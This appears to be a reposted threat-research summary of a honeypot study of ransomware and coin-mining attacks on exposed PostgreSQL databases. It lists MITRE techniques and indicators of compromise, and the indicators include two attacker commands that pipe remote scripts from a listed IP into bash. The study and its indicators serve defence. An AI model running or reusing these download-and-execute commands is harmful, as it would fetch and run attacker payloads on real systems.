Threat Research

“Securing Postgres: Essential Insights from a Honeypot Analysis”

admin

Summary:

In 2023, Team Axon conducted a honeypot analysis revealing a surge in ransomware and coin mining attacks targeting publicly exposed PostgreSQL databases. The findings underscore the urgent need for enhanced security measures, as databases were compromised within minutes of exposure. The report emphasizes the importance of robust security practices to protect against these escalating threats.

Keypoints:

  • Team Axon set up a honeypot to analyze attacks on publicly exposed PostgreSQL databases.
  • Ransomware attacks involved deleting all tables and demanding cryptocurrency payments.
  • Databases were compromised within seven minutes of becoming publicly accessible.
  • Over 1.3 million PostgreSQL instances were found exposed on the internet.
  • Two main attack vectors identified: ransomware and coin mining.
  • Weak passwords and default usernames were exploited for initial access.
  • Recommendations include using strong passwords, IP whitelisting, and log auditing.
  • Managed database solutions are suggested for enhanced security.
  • Regular backups are crucial to mitigate ransomware risks.

MITRE Techniques

  • Initial Access (T1078): Utilizes default credentials to gain access to PostgreSQL databases.
  • Data Encrypted for Impact (T1486): Deletes database tables and demands ransom for recovery.
  • Command and Control (T1071): Uses various methods for maintaining communication with compromised systems.
  • Execution (T1059): Executes commands through PostgreSQL using “copy from program” statements.

IoC:

  • [IP Address] 185.225.75.188
  • [IP Address] 194.180.49.20
  • [IP Address] 194.180.49.9
  • [IP Address] 185.225.75.189
  • [Domain] hzawa.com
  • [IP Address] 109.237.96.124
  • [IP Address] 178.128.152.119
  • [Domain] sterlingdevelopmentct.com
  • [IP Address] 107.170.51.199
  • [IP Address] 68.183.57.197
  • [IP Address] 159.65.111.248
  • [IP Address] 142.93.18.147
  • [IP Address] 138.197.146.75
  • [IP Address] 194.38.22.53
  • [Others] curl http://194.38.22.53/pg2.sh|bash
  • [Others] curl/wget 194.38.22.53/pg.sh|bash

Full Research: https://www.hunters.security/en/blog/protecting-postgres

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint